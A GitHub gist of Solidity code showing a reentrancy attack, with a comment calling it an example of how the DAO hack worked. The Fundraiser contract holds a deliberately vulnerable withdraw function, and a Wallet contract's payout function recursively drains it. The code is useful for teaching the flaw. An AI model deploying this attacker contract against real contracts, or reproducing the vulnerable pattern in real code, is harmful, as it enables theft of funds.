Skip to content

Instantly share code, notes, and snippets.

Embed
What would you like to do?
Created using remix-ide: Realtime Ethereum Contract Compiler and Runtime. Load this file by pasting this gists URL or ID at https://remix.ethereum.org/#version=soljson-v0.4.26+commit.4563c3fc.js&optimize=false&runs=200&gist=
pragma solidity ^0.4.24;
contract Fundraiser {
mapping(address=>uint) balances;
// VULNERABLE
function withdrawCoins(){
uint withdrawAmount = balances[msg.sender];
Wallet wallet = Wallet(msg.sender);
wallet.payout.value(withdrawAmount)();
// this line is not reached before the next recursion!!
balances[msg.sender] = 0;
}
function getBalance() constant returns (uint) {
return address(this).balance;
}
function contribute() payable {
balances[msg.sender] += msg.value;
}
function() payable {
}
}
contract Wallet {
Fundraiser fundraiser;
uint recursion=20;
function Wallet(address fundraiserAddress) {
fundraiser = Fundraiser(fundraiserAddress);
}
function contribute(uint amount) {
fundraiser.contribute.value(amount)();
}
function withdraw(){
fundraiser.withdrawCoins();
}
function getBalance() constant returns (uint) {
return address(this).balance;
}
function payout() payable {
// exploit
if(recursion>0) {
recursion--;
fundraiser.withdrawCoins();
}
}
function() payable {
}
}
@shoupn
Copy link
Author

shoupn commented Feb 21, 2022

Example of how the DAO contract was hacked, leading to the loss of ethereum.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment